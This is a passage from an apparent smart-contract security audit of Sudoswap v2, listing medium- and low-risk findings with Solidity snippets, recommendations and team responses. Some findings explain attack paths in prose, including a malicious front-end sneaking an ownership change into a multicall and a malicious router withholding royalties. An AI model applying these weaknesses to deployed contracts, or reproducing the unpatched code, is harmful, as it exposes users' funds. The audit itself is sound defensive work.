+5.2.16 A malicious router can skip transfer of royalties and protocol fee Severity: Medium Risk Context: LSSVMPairERC20.sol#L59-L91 Description: A malicious router, if accidentally/intentionally whitelisted by the protocol, may implement pairTransferERC20From() functions which do not actually transfer the number of tokens expected. This is within the protocol's threat model, as evidenced by the use of before-after balance checks on the _assetRecipient for saleAmount. However, similar before-after balance checks are missing for transfers of royalties and protocol fee payments. Royalty recipients do not receive their royalties from the malicious router if the protocol/factory intentionally/accidentally whitelists one. The protocol/factory may also accidentally whitelist a malicious router that does not transfer even the protocol fee. Recommendation: Add before-after balance checks for royalty and protocol fee transfers. Sudorandom Labs: Talked internally, we're going to hold off on this one for now: The factory owner has no incentive to add routers which don't pay the fee, and if they do (e.g. by accident), they can always disable / add a new one. The gas trade-off here is one we're potentially willing to make. Spearbit: Verified that this is partially fixed in PR#40. Acknowledged the part about protocolFee.
+5.2.17 Malicious front-end can sneak intermediate ownership changes to perform unauthorized actions Severity: Medium Risk Context: LSSVMPair.sol#L653-L667 Description: LSSVMPair implements an onlyOwner multicall function to allow the owner to batch multiple calls. The Natspec indicates that this is "Intended for withdrawing/altering pool pricing in one tx, only callable by owner, cannot change owner." The check require(owner() == msg.sender, "Ownership cannot be changed in multicall"); with a preceding comment "Prevent multicall from malicious frontend sneaking in ownership change" indicates the intent of the check and that a malicious front-end is within the threat model.
While the post-loop check prevents malicious front-ends from executing ownership changing calls that attempt to persist beyond the multicall, this still allows one to sneak in an intermediate ownership change during a call -> perform malicious actions under the new unauthorized malicious owner within the onOwnershipTransferred() callback -> change ownership back to the originally authorized msg.sender owner before returning from the callback, thereby successfully executing any subsequent (onlyOwner) calls and passing the existing check. While a malicious front-end could introduce many attack vectors that are out-of-scope for detecting/preventing in backend contracts, an unauthorized ownership change seems like a critical one and warrants additional checks for the onlyOwner multicall to prevent malicious actions from being executed in the context of any newly/temporarily unauthorized owner. Recommendation: Prevent transferOwnership() calls in multicall. Consider adding sufficient warnings/documentation for this privileged multicall usage from front-ends. Sudorandom Labs: Solved in PR#41. Spearbit: Verified that this is fixed by PR#41.
+5.2.18 Missing override in authAllowedForToken prevents authorized admins from toggling settings and reclaiming pairs Severity: Medium Risk Context: LSSVMPairFactory.sol#L330-L377, RoyaltyEngine.sol#L38-L46 Description: Manifold admins are incorrectly not allowed by authAllowedForToken to toggle settings and reclaim their authorized pairs in the protocol context. authAllowedForToken checks for different admin overrides, including admin interfaces of the NFT marketplaces Nifty, Foundation, Digitalax and ArtBlocks. However, the protocol supports royalties from the other marketplaces Manifold, Rarible, SuperRare and Zora. Of those, Manifold does have a getAdmins() interface which is not considered in authAllowedForToken, and it is not certain that the others don't. Recommendation: Add admin support for Manifold and other marketplaces (Rarible, SuperRare and Zora), if available, that are recognized by the protocol. Sudorandom Labs: Acknowledged, no change for now. Adherence to the manifold code is preferred over extending the admin surface for now. The Manifold implementation contract uses AdminControlUpgradeable, which contains an isAdmin function. This function is covered by line LSSVMPairFactory.sol#L338. Spearbit: Acknowledged.
+5.2.19 Misdirected transfers to invalid pair variants or non-pair recipients may lead to loss/lock of NFTs/tokens Severity: Medium Risk Context: LSSVMPairFactory.sol#L650-L663, LSSVMPairFactory.sol#L668-L676 Description: Functions depositNFTs() and depositERC20() allow deposits of ERC721 NFTs and ERC20 tokens after pair creation. While they check that the deposit recipient is a valid pair/variant for emitting an event, the deposit transfers happen prior to the check and without the same validation. With dual home tokens (see weird-erc20), the event emission could be skipped when the "other" token is transferred. Also, the isPair() check in depositNFTs() does not specifically check if the pair variant is ERC721_ERC20 or ERC721_ETH. This allows accidentally misdirected deposits to invalid pair variants or non-pair recipients, leading to loss/lock of NFTs/tokens. Recommendation: For functions depositNFTs() and depositERC20(), apply the specific pair variant check for both events and transfers, and check that the right tokens/NFTs are deposited. Sudorandom Labs: We'll acknowledge the finding, but no additional changes at this time.
Only event emission is important to be tracked with the pool type, as pool owners can always withdraw any erc20/721/1155 sent to their pool (in the event they e.g. deposit to a pool they own for a different asset type). Spearbit: Acknowledged.
+5.2.20 authAllowedForToken() returns prematurely in certain scenarios causing an authentication DoS Severity: Medium Risk Context: LSSVMPairFactory.sol#L330-L377 Description: Tokens listed on Nifty or Foundation (therefore returning a valid niftyRegistry or foundationTreasury) where the proposedAuthAddress is not a valid Nifty sender or a valid Foundation Treasury admin will cause an authentication DoS if the token were also listed on Digitalax or ArtBlocks and the proposedAuthAddress had admin roles on those platforms. This happens because the return values of valid and isAdmin for isValidNiftySender(proposedAuthAddress) and isAdmin(proposedAuthAddress) respectively are returned as-is, instead of returning only if/when they are true but continuing the checks for authorization otherwise (if/when they are false) on Digitalax and ArtBlocks. toggleSettingsForCollection and reclaimPair (which utilize authAllowedForToken) would incorrectly fail for a valid proposedAuthAddress in such scenarios. Recommendation: Check the valid and isAdmin return values of isValidNiftySender(proposedAuthAddress) and isAdmin(proposedAuthAddress) and return if they are true (as done for Digitalax). Continue with the authorization checks otherwise, if/when they are false. Sudorandom Labs: Addressed in PR#64. Spearbit: Verified that this is fixed by PR#64.
5.3 Low Risk
+5.3.1 Partial fills don't recycle ETH Severity: Low Risk Context: VeryFastRouter.sol#L211-L425 Description: After several fixes are applied, the following code exists. If the sell can be filled completely then ETH is recycled; however, when a partial fill is applied then ETH is not recycled. This might lead to a revert and would require doing the trade again. This costs extra gas and the trading conditions might be worse by then. function swap(Order calldata swapOrder) external payable returns (uint256[] memory results) { ... // Go through each sell order ... if (pairSpotPrice == order.expectedSpotPrice) { // If the pair is an ETH pair and we opt into recycling ETH, add the output to our total accrued if (order.isETHSell && swapOrder.recycleETH) { ... order.pair.swapNFTsForToken(..., payable(address(this)), ...); } // Otherwise, all tokens or ETH received from the sale go to the token recipient else { ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ...); } } // Otherwise we need to do some partial fill calculations first else { ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ...); // ETH not recycled } // Go through each buy order ... } Recommendation: Consider also recycling ETH in the partial fill case. Sudorandom Labs: There are a few situations where this could happen: • The user intends to sell for more than they are trying to buy, and they are sending 0 ETH. They encounter a partial fill, and they still receive enough ETH to cover their buys. The ETH received from selling is recycled, and the buy succeeds. • The user intends to sell for more than they are trying to buy, and they are sending 0 ETH. They encounter a partial fill, and they do not receive enough ETH to cover their buys. The ETH received from selling is recycled, but the buy still fails because there is not enough ETH.
• The user intends to sell for less than they are trying to buy, and they send only enough ETH to cover a buy assuming the sell succeeds. They encounter a partial fill, and they do not receive enough ETH to cover their buys. The ETH received from selling is recycled, but the buy still fails because there is not enough ETH. Given that I expect situations 2 and 3 to be common, I don't think it's worth complicating the code more to handle case 1. If this becomes a larger issue in the future, there is always the choice of writing a new router to handle it. But for now, I think I will leave it as-is. Spearbit: Acknowledged.
+5.3.2 Wrong allowances can be abused by the owner Severity: Low Risk Context: LSSVMPair.sol#L640-L645 Description: The function call() allows transferring tokens and NFTs that have an allowance set to the pair. Normally, allowances should be given to the router, but they could be accidentally given to the pair. Although call() is protected by onlyOwner, the pair is created permissionlessly and so the owner could be anyone. Recommendation: In function call() disallow the targets nft() and erc20() (for ERC20 pairs). Sudorandom Labs: This has been solved by the project team after the audit started in PR#34 and PR#52. Spearbit: Verified that this is fixed by PR#34 and PR#52.
+5.3.3 Malicious router mitigation may break for deflationary tokens Severity: Low Risk Context: LSSVMPairERC20.sol#L72-L75 Description: The ERC20 _pullTokenInputAndPayProtocolFee() for routers has a mitigation for malicious routers by checking that the before-after token balance difference is equal to the transferred amount. This will break for any ERC20 pairs with fee-on-transfer deflationary tokens (see weird-erc20). Note that there has been a real-world exploit related to this with the Balancer pool and STA deflationary tokens. Recommendation: Evaluate the feasibility of disallowing ERC20 deflationary tokens vis-a-vis the likelihood of pairs using deflationary tokens leading to this issue. Sudorandom Labs: Acknowledged, no change for now. Pair creators specify their own quote token, i.e. no allowlist for quote tokens. So the risk is there and pair creators will need to select their quote tokens appropriately. Spearbit: Acknowledged.
+5.3.4 Inconsistent royalty threshold checks allow some royalties to be equal to sale amount Severity: Low Risk Context: RoyaltyEngine.sol#L197-L210, RoyaltyEngine.sol#L225-L231 Description: Threshold checks on royalty amounts are implemented both in _getRoyaltyAndSpec() and its caller _calculateRoyalties(). While _calculateRoyalties() implements an inclusive check with require(saleAmount >= royaltyTotal, "Royalty exceeds sale price"); (allowing royalty to be equal to the sale amount), the different checks in _getRoyaltyAndSpec() on the returned amounts, or in the calculations on bps in _computeAmounts(), exclude the saleAmount, forcing royalty to be less than the saleAmount. However, Known Origin and SuperRare alone are missing a similar threshold check in _getRoyaltyAndSpec(). This allows only the Known Origin and SuperRare royalties to be equal to the sale amount, as enforced by the check in _calculateRoyalties(). Recommendation: Consider adding checks for Known Origin and SuperRare royalties in _getRoyaltyAndSpec() and remove the redundant/inclusive check from _calculateRoyalties() which allows their royalties to be equal to the sale amount. Sudorandom Labs: This PR aims to centralize all the input vs royalty amount checking in LSSVMPair rather than the RoyaltyEngine.
We need to check that Settings don't override the royalty percentage to be too high anyway, which is already checked in _calculateRoyalties, so the decision is to remove the total amount checking in the RoyaltyEngine and instead centralize the check in the Pair itself. Spearbit: Verified that this is fixed by PR#60 and PR#78.
+5.3.5 Numerical difference between getNFTQuoteForBuyOrderWithPartialFill() and _findMaxFillableAmtForBuy() may lead to precision errors Severity: Low Risk Context: VeryFastRouter.sol#L56-L95, VeryFastRouter.sol#L228-L266 Description: There is a slight numerical instability between the partial fill calculation and the first client-side calculation (i.e. getNFTQuoteForSellOrderWithPartialFill() / getNFTQuoteForBuyOrderWithPartialFill() vs _findMaxFillableAmtForBuy()). This is because getNFTQuoteForSellOrderWithPartialFill() first assumes a buy of 1 item, updates spotPrice/delta, and then gets the next subsequent quote to buy the next item, whereas _findMaxFillableAmtForBuy() assumes buying multiple items at one time. For e.g. ExponentialCurve.sol and XykCurve.sol this can lead to minor numerical precision errors. function getNFTQuoteForBuyOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, ...); ... } } function getNFTQuoteForSellOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getSellInfo(spotPrice, delta, 1, fee, ...); ... } ... } function _findMaxFillableAmtForBuy(LSSVMPair pair, uint256 maxNumNFTs, uint256[] memory maxCostPerNumNFTs, ...) ... { ... while (start <= end) { ... (...) = pair.bondingCurve().getBuyInfo(spotPrice, delta, (start + end)/2, feeMultiplier, protocolFeeMultiplier); ... } } Recommendation: This has been solved after the review started in PR#27. getNFTQuoteForSellOrderWithPartialFill() now accepts an optional slippage parameter which scales up the buy quotes by that amount. As long as the slippage amount is kept to a minimum (e.g. 0.00000001%), this should be acceptable. Sudorandom Labs: Solved in PR#27. Spearbit: Verified that this is fixed by PR#27.
+5.3.6 Differences with Manifold version of RoyaltyEngine may cause unexpected behavior Severity: Low Risk Context: RoyaltyEngine.sol#L94-L108, RoyaltyEngine.sol#L132-L159, Manifold RoyaltyEngineV1.sol#L91-L109, Manifold RoyaltyEngineV1.sol#L170-L189 Description: Sudoswap has forked RoyaltyEngine from Manifold; however, there are some differences. The Manifold version of _getRoyaltyAndSpec() also queries getRecipients(), while the Sudoswap version doesn't. This means Sudoswap will not spread the royalties over all recipients. function _getRoyaltyAndSpec(...) // Manifold ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 amount) { ... try IRoyaltySplitter(royaltyAddress).getRecipients() returns (Recipient[] memory splitRecipients) { ... } } } function _getRoyaltyAndSpec(...) // Sudoswap ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 amount) { ... } ... } } The Manifold version of getRoyalty() has an extra try/catch compared to the Sudoswap version. This protects against reverts in the cached functions.
Note: adding an extra try/catch requires the function _getRoyaltyAndSpec() to be external. function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Manifold ... try this._getRoyaltyAndSpec{gas: 100000}(tokenAddress, tokenId, value) returns (...) ... } function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Sudoswap ... (...) = _getRoyaltyAndSpec(tokenAddress, tokenId, value); } Recommendation: Check the latest version of the Manifold code to determine if anything needs updating. Sudorandom Labs: Acknowledged, we don't feel strongly about the added code so we'll leave ours as is. Spearbit: Acknowledged.
+5.3.7 Swaps with property-checked ERC1155 sell orders in VeryFastRouter will fail Severity: Low Risk Context: VeryFastRouter.sol#L120, VeryFastRouter.sol#L134 Description: Any swap batch of transactions which has a property-checked sell order for ERC1155 will revert. Given that property checks are not supported on ERC1155 pairs (but only ERC721), swap sell orders for ERC1155 in VeryFastRouter will fail if order.doPropertyCheck is accidentally set, because the logic thereafter assumes it is an ERC721 order. Recommendation: Check if the order pair is ERC721 before checking properties, or allow users to explicitly specify in an order if it is ERC721 or ERC1155 specific. Sudorandom Labs: No change for now. Callers using the router should set the appropriate parameters for the asset type of the swap. The downside is bounded as a revert (rather than e.g. callers losing their funds), which is an acceptable risk. Spearbit: Acknowledged.
+5.3.8 changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell Severity: Low Risk Context: StandardSettings.sol#L287 Description: changeSpotPriceAndDelta() reverts when there is exactly enough liquidity to support 1 sell because it uses > instead of >= in the check pairBalance > newPriceToSellToPair. Recommendation: Use >= instead of >: // If the new sell price is higher, and there is enough liquidity to support at least 1 sell, then make the change - if ((newPriceToSellToPair > priceToSellToPair) && pairBalance > newPriceToSellToPair) { + if ((newPriceToSellToPair > priceToSellToPair) && pairBalance >= newPriceToSellToPair) { Sudorandom Labs: Solved in PR#56. Spearbit: Verified that this is fixed by PR#56.
+5.3.9 Lack of support for per-token royalties may lead to incorrect royalty payments Severity: Low Risk Context: LSSVMPair.sol#L259, LSSVMPairERC721.sol#L52 Description: The protocol currently lacks complete support for per-token royalties; it assumes that all NFTs in a pair have the same royalty and so considers the first assetId to determine royalties for all NFT token ids in the pair. If not, the pair owner is expected to make a new pair for NFTs that have different royalties. A pair with NFTs that have different royalties will lead to incorrect royalty payments for the different NFTs. Recommendation: Evaluate adding complete support for per-token royalties. Sudorandom Labs: This is a design decision to balance the trade-off between gas and utility. If different NFT IDs have different royalty amounts / receivers (e.g. ArtBlocks), the intent is for pool owners to separate them into different pools. Spearbit: Acknowledged.
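A hedged sketch of what per-token royalty support could look like, reusing the existing _calculateRoyaltiesView() per id instead of only the first assetId (salePricePerItem and the loop placement are assumptions; the team explicitly traded this off for gas):

uint256 royaltyTotal;
for (uint256 i; i < nftIds.length; i++) {
    // Query royalties per token id rather than assuming they are uniform
    (,, uint256 royalty) = _calculateRoyaltiesView(nftIds[i], salePricePerItem);
    royaltyTotal += royalty;
}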
+5.3.10 Missing additional safety for multicall may lead to lost ETH in future Severity: Low Risk Context: LSSVMPair.sol#L653-L663 Description: If the function multicall() were payable, then multiple delegated-to functions could use the same msg.value, which could result in losing ETH from the pair. A future upgrade of Solidity might change the default setting for functions to payable. See Solidity issue#12539. function multicall(bytes[] calldata calls, bool revertOnFail) external onlyOwner { for (uint256 i; i < calls.length;) { (bool success, bytes memory result) = address(this).delegatecall(calls[i]); ... } } Recommendation: Consider adding a check on msg.value to be future proof and extra safe. Alternatively, add a comment about the risk. function multicall(bytes[] calldata calls, bool revertOnFail) external onlyOwner { require(msg.value == 0); for (uint256 i; i < calls.length;) { (bool success, bytes memory result) = address(this).delegatecall(calls[i]); ... } } Sudorandom Labs: Acknowledged, no change for now as Solidity has not made functions payable by default. Spearbit: Acknowledged.
+5.3.11 Missing zero-address check may allow re-initialization of pairs Severity: Low Risk Context: LSSVMPair.sol#L118-L126 Description: LSSVMPair.initialize() checks if it is already initialized using require(owner() == address(0), "Initialized");. However, without a zero-address check on _owner, this can be true even later if the pair is accidentally initialized with address(0) instead of msg.sender. This is because __Ownable_init in OwnableWithTransferCallback does not disallow address(0), unlike transferOwnership. Therefore, LSSVMPair.initialize() may be called multiple times. This is however not the case with the current implementation, where LSSVMPair.initialize() is called from LSSVMPairFactory with msg.sender as the argument for _owner. Recommendation: Add a zero-address check on the _owner parameter of initialize(). Sudorandom Labs: Acknowledged, no change as at the moment we pass in the caller to be the owner of pairs. Spearbit: Acknowledged.
+5.3.12 Trade pair owners are allowed to change asset recipient address when it has no impact Severity: Low Risk Context: LSSVMPair.sol#L627-L632, LSSVMPair.sol#L310-L328 Description: Trade pair owners are allowed to change their asset recipient address using changeAssetRecipient(), while getAssetRecipient() always returns the pair address itself for Trade pairs, as expected. Trade pair owners mistakenly assume that they can change their asset recipient address using changeAssetRecipient() because they are allowed to do so successfully, but may be surprised to see that it has no effect. They may expect assets at the new address but that will not be the case. Recommendation: changeAssetRecipient() could exclude PoolType.TRADE owners from being allowed to change the asset recipient. Sudorandom Labs: It's intended to let this value be changed for TRADE pools. To avoid an extra storage slot, getFeeRecipient reads from this value for TRADE pools. Spearbit: Acknowledged.
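A minimal sketch of the suggested restriction (hypothetical, since the team intentionally reuses this storage slot for getFeeRecipient on TRADE pools):

function changeAssetRecipient(address payable newRecipient) external onlyOwner {
    // getAssetRecipient() always resolves to the pair itself for TRADE pools,
    // so disallow a change that would silently have no effect
    require(poolType() != PoolType.TRADE, "Not for TRADE pools");
    ...
}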
+5.3.13 NFT projects with custom settings and multiple royalty receivers will receive royalty only for first receiver Severity: Low Risk Context: LSSVMPair.sol#L489-L503, LSSVMPair.sol#L523-L538 Description: _calculateRoyalties() and its view equivalent only consider the first royalty receiver when custom settings are enabled. If non-ERC-2981 compliant NFT projects on Manifold/ArtBlocks or other platforms that support multiple royalty receivers come up with custom settings that pair owners subscribe to, then all the royalty will go to the first recipient. Other receivers will not receive any royalties. Recommendation: Evaluate splitting of enhanced setting royalties evenly/proportionally across all receivers. Sudorandom Labs: To give you more context on this logic, most NFT projects only have a single royalty receiver as they follow the ERC2981 standard. However, Manifold and ArtBlocks will sometimes have multiple receivers. In these cases, we choose to use the first receiver for simplicity's sake if the pair has custom settings. It is unlikely that a project creator will both use Manifold and also have custom settings. Acknowledged, no change as this is only relevant for a small subset of collections, and is an acceptable risk. Spearbit: Acknowledged.
+5.3.14 Missing non-zero checks allow event emission spamming Severity: Low Risk Context: LSSVMPairFactory.sol#L650-L663, LSSVMPairFactory.sol#L668-L676 Description: Functions depositNFTs() and depositERC20() are meant to allow deposits into the pair post-creation. However, they do not check if a non-zero number of NFTs or tokens is being deposited. The event emission only checks if the pair recipient is valid. Given their permissionless nature, this allows anyone to grief the system with zero NFT/token deposits causing emission of events, which may hinder indexing/monitoring systems. Recommendation: Add non-zero checks for numNFTs and amount before event emission. Sudorandom Labs: Solved in PR#63. Spearbit: Verified that this is fixed by PR#63.
+5.3.15 Missing sanity zero-address checks may lead to undesired behavior or lock of funds Severity: Low Risk Context: StandardSettings.sol#L38-L42, StandardSettings.sol#L132, StandardSettings.sol#L164-L206, LSSVMPairFactory.sol#L82-L98, LSSVMPairFactory.sol#L393, VeryFastRouter.sol#L48-L50, VeryFastRouter.sol#L210, LSSVMRouter.sol#L232, LSSVMRouter.sol#L362, LSSVMRouter.sol#L597, LSSVMPairETH.sol#L63, LSSVMPairETH.sol#L95, LSSVMPairETH.sol#L114, Splitter.sol#L34 Description: Certain logic requires zero-address checks to avoid undesired behavior or lock of funds. For example, in Splitter.sol#L34 users can permanently lock ETH by mistakenly using safeTransferETH with a default/zero-address value. Recommendation: Check if an address-type variable is address(0) and revert when true with an appropriate error message. In particular, see: • StandardSettings.sol#L38-L42: consider adding require(_settingsFeeRecipient != address(0)). • StandardSettings.sol#L164-L206: consider adding require(pairInfo.prevOwner != address(0)). • LSSVMPairFactory.sol#L82-L98: consider adding require(_protocolFeeRecipient != address(0)). • VeryFastRouter.sol#L48-L50: consider adding require(_factory != address(0)). • StandardSettings.sol#L132, LSSVMRouter.sol#L597, LSSVMRouter.sol#L362, LSSVMRouter.sol#L232, LSSVMPairFactory.sol#L393, LSSVMPairETH.sol#L114, LSSVMPairETH.sol#L95, LSSVMPairETH.sol#L63, VeryFastRouter.sol#L210, Splitter.sol#L34: consider adding a zero-address check on the recipient of safeTransferETH. Sudorandom Labs: We're going to pass on this since the exploit scope is low impact. Spearbit: Acknowledged.
+5.3.16 Legacy NFTs are not compatible with protocol pairs Severity: Low Risk Context: LSSVMPair.sol#L15 Description: Pairs support ERC721 and ERC1155 NFTs.
+5.3.16 Legacy NFTs are not compatible with protocol pairs
Severity: Low Risk
Context: LSSVMPair.sol#L15
Description: Pairs support ERC721 and ERC1155 NFTs. However, users of NFT marketplaces may also expect to find OG NFTs such as Cryptopunks, Etherrocks or Cryptokitties, which do not adhere to these ERC standards. For example, Cryptopunks have their own internal marketplace which allows users to trade their NFTs with other users. Given that Cryptopunks does not adhere to the ERC721 standard, trades will always fail when the protocol attempts them. Even with wrapped versions of these NFTs, people who aren't aware of the wrapper or who hold the original version won't be able to trade them in a pair.
Recommendation: Consider adding compatibility, as it's a competitive feature. The typical way of supporting these assets is to add a dedicated flow for their addresses, as shown here (a sketch follows 5.3.18 below).
Sudorandom Labs: Yes, this is a known incompatibility. There are various wrapped variants (e.g. for mooncats/punks) which have support for ERC721. The design goal here is to adhere more towards the asset standards when possible. I am okay that certain legacy assets may be out of scope.
Spearbit: Acknowledged.
+5.3.17 Unnecessary payable specifier for functions may allow ETH to be sent and locked/lost
Severity: Low Risk
Context: LSSVMRouter.sol#L410-L415, LSSVMPair.sol#L118-L124
Description: The functions LSSVMRouter.robustSwapERC20ForSpecificNFTsAndNFTsToToken() and LSSVMPair.initialize(), which do not expect to receive and process Ether, have the payable specifier, which allows interacting users to accidentally send them Ether that will get locked/lost.
Recommendation: Remove the payable specifier from these functions which do not expect to receive and process Ether.
Sudorandom Labs: Solved in PR#66.
Spearbit: Verified that this is fixed by PR#66.
+5.3.18 Obsolete Splitter contract may lead to locked ETH/tokens
Severity: Low Risk
Context: Splitter.sol#L31-L60, StandardSettings.sol#L89-L91, StandardSettings.sol#L164-L206
Description: After a pair has been reclaimed via reclaimPair(), pairInfos[] will be emptied and getPrevFeeRecipientForPair() will return 0. The obsolete Splitter will however remain present, and any ETH or tokens that are sent to the contract can't be retrieved via withdrawETH() and withdrawTokens(). This is because getPrevFeeRecipientForPair() is 0, so the funds would be sent to address(0). It is unlikely, though, that ETH or tokens are sent to the Splitter contract once it is no longer used.
    function withdrawETH(uint256 ethAmount) public {
        ISettings parentSettings = ISettings(getParentSettings());
        ...
        payable(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter())).safeTransferETH(...);
    }
    function withdrawTokens(ERC20 token, uint256 tokenAmount) public {
        ISettings parentSettings = ISettings(getParentSettings());
        ...
        token.safeTransfer(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter()), ...);
    }
    function getPrevFeeRecipientForPair(address pairAddress) public view returns (address) {
        return pairInfos[pairAddress].prevFeeRecipient;
    }
    function reclaimPair(address pairAddress) public {
        ...
        delete pairInfos[pairAddress];
        ...
    }
Recommendation: Evaluate whether it is worth doing anything with the obsolete Splitter contract.
Sudorandom Labs: Acknowledged, no change for now.
Spearbit: Acknowledged.
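For 5.3.16, a sketch of the dedicated-flow idea for pre-ERC721 assets. transferPunk() exists on the original CryptoPunks contract; the branching helper and the minimal interfaces here are illustrative:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    interface ICryptoPunks {
        function transferPunk(address to, uint256 punkIndex) external;
    }

    interface IERC721Minimal {
        function transferFrom(address from, address to, uint256 id) external;
    }

    contract LegacyNFTFlowSketch {
        address public immutable punks;

        constructor(address punks_) { punks = punks_; }

        function _sendNFT(address nft, address to, uint256 id) internal {
            if (nft == punks) {
                // CryptoPunks predate ERC721 and only expose their own transfer.
                ICryptoPunks(nft).transferPunk(to, id);
            } else {
                IERC721Minimal(nft).transferFrom(address(this), to, id);
            }
        }
    }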
+5.3.19 Divisions in getBuyInfo() and getSellInfo() may be rounded down to 0
Severity: Low Risk
Context: XykCurve.sol#L42-L134
Description: In extreme cases (e.g. tokens with few decimals, see this example), the divisions in getBuyInfo() and getSellInfo() may be rounded down to 0. This means inputValueWithoutFee and/or outputValueWithoutFee may be 0.
    function getBuyInfo(..., uint256 numItems, ...) ... {
        ...
        uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems);
        ...
    }
    function getSellInfo(..., uint256 numItems, ...) ... {
        ...
        uint256 outputValueWithoutFee = (numItems * tokenBalance) / (nftBalance + numItems);
        ...
    }
Recommendation: The rounding down could be ignored, as it involves very low amounts of tokens. Alternatively, round up, for example in the following way (a sketch follows 5.3.21 below):
    uint256 inputValueWithoutFee = (numItems * tokenBalance + (nftBalance - numItems - 1)) / (nftBalance - numItems);
Sudorandom Labs: This is an acceptable risk when decimals and prices are both very low.
Spearbit: Acknowledged.
+5.3.20 Last NFT in an XykCurve cannot be sold
Severity: Low Risk
Context: XykCurve.sol#L42-L88, StandardSettings.sol#L227-L294, LSSVMPair.sol#L206-L219
Description: The function getBuyInfo() of XykCurve enforces numItems < nftBalance, which means the last NFT can never be sold. One potential solution, as suggested by the Sudoswap team, is to set delta (= nftBalance) one higher than the real number of NFTs. This could cause problems in other parts of the code. For example, once only one NFT is left, if we try to use changeSpotPriceAndDelta(), getBuyNFTQuote(1) will error, and thus the prices (tokenBalance) and delta (nftBalance) can't be changed anymore. If nftBalance is set one higher, then the condition pair.nft().balanceOf(pairAddress) >= 1 won't be satisfied.
    contract XykCurve ... {
        function getBuyInfo(..., uint256 numItems, ...) ... {
            ...
            uint256 tokenBalance = spotPrice;
            uint256 nftBalance = delta;
            ...
            // If numItems is too large, we will get divide by zero error
            if (numItems >= nftBalance) {
                return (Error.INVALID_NUMITEMS, 0, 0, 0, 0, 0);
            }
            ...
        }
    }
    function changeSpotPriceAndDelta(...) ... {
        ...
        (,,, uint256 priceToBuyFromPair,) = pair.getBuyNFTQuote(1);
        ...
        if (... && pair.nft().balanceOf(pairAddress) >= 1) {
            pair.changeSpotPrice(newSpotPrice);
            pair.changeDelta(newDelta);
            return;
        }
        ...
    }
    function getBuyNFTQuote(uint256 numNFTs) ... {
        (error, ...) = bondingCurve().getBuyInfo(..., numNFTs, ...);
    }
Recommendation: Evaluate what to do with the last NFT in an XykCurve. Perhaps it is unsolvable due to the nature of xy = k curves.
Sudorandom Labs: Acknowledged, the last item is an open question for now. As long as pair creators understand the pricing dynamic, this is an acceptable risk.
Spearbit: Acknowledged.
+5.3.21 Allowing different ERC20 tokens in LSSVMRouter swaps will affect accounting and lead to undefined behavior
Severity: Low Risk
Context: LSSVMRouter.sol#L109-L135
Description: As the code comments note: "All ERC20 swaps assume that a single ERC20 token is used for all the pairs involved. Swapping using multiple tokens in the same transaction is possible, but the slippage checks & the return values will be meaningless and may lead to undefined behavior." This assumption may be risky if users end up mistakenly using different ERC20 tokens in different swaps: summing up their inputAmount and remainingValue will not be meaningful and will lead to accounting errors and undefined behavior (as noted).
Recommendation: Consider adding checks to enforce (instead of assuming/warning) that the ERC20 tokens used in all the swap-list pairs are the same.
Sudorandom Labs: Acknowledged. VeryFastRouter is intended to be the full-featured router for interacting with v2 of the pairs and has support for separate minOutput values for different tokens.
Spearbit: Acknowledged.
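For 5.3.19, a sketch of ceiling division applied to the buy quote so a buyer always pays at least 1 wei; the free function and the variable names mirror the snippet above and are otherwise illustrative:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // ceil(a / b) for b > 0, written to avoid overflow in a + b - 1
    function divUp(uint256 a, uint256 b) pure returns (uint256) {
        return a == 0 ? 0 : (a - 1) / b + 1;
    }

    contract BuyQuoteSketch {
        function inputValueWithoutFee(uint256 numItems, uint256 tokenBalance, uint256 nftBalance)
            external
            pure
            returns (uint256)
        {
            // Rounding up avoids a 0 quote for low-decimal tokens.
            return divUp(numItems * tokenBalance, nftBalance - numItems);
        }
    }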
+5.3.22 Missing array length equality checks may lead to incorrect or undefined behavior
Severity: Low Risk
Context: LSSVMPairERC721.sol#L292-L298, LSSVMPairERC1155.sol#L273-L301, StandardSettings.sol#L301-L313, RoyaltyEngine.sol#L78-L89, MerklePropertyChecker.sol#L18-L28
Description: Functions taking two array-type parameters and not checking that their lengths are equal may exhibit incorrect or undefined behavior when accidentally passed arrays of unequal lengths.
Recommendation: Check that the lengths of the two array parameters are equal before use.
Sudorandom Labs: Acknowledged, no change, for the following reasons: the LSSVMPair functions are owner-operated, so if any mismatches arise, the owner can just call them again. For the RoyaltyEngine, the bulkCache call is also user-initiated, so it can also be retried.
Spearbit: Acknowledged.
+5.3.23 Owners may have funds locked if newOwner is an EOA in transferOwnership()
Severity: Low Risk
Context: OwnableWithTransferCallback.sol#L45
Description: In transferOwnership(), if newOwner has zero code.length (i.e. it is an EOA), newOwner.isContract() will be false and the if block will be skipped. As the function is payable, any msg.value sent with the call would get locked in the contract. Note: ERC20 pairs and StandardSettings don't have a method to recover ETH.
Recommendation: Create an else block where msg.value is checked for not being 0. If it is not 0, transfer msg.value back to the msg.sender or revert.
Sudorandom Labs: Acknowledged, no change for now. Certain owners may wish to both transfer ownership and send funds to the new recipient. Any issues with the recipient, e.g. being unable to accept ETH, are an acceptable risk.
Spearbit: Acknowledged.
+5.3.24 Use of transferFrom may lead to NFTs getting locked forever
Severity: Low Risk
Context: LSSVMPairERC721.sol#L199, LSSVMPairERC721.sol#L253
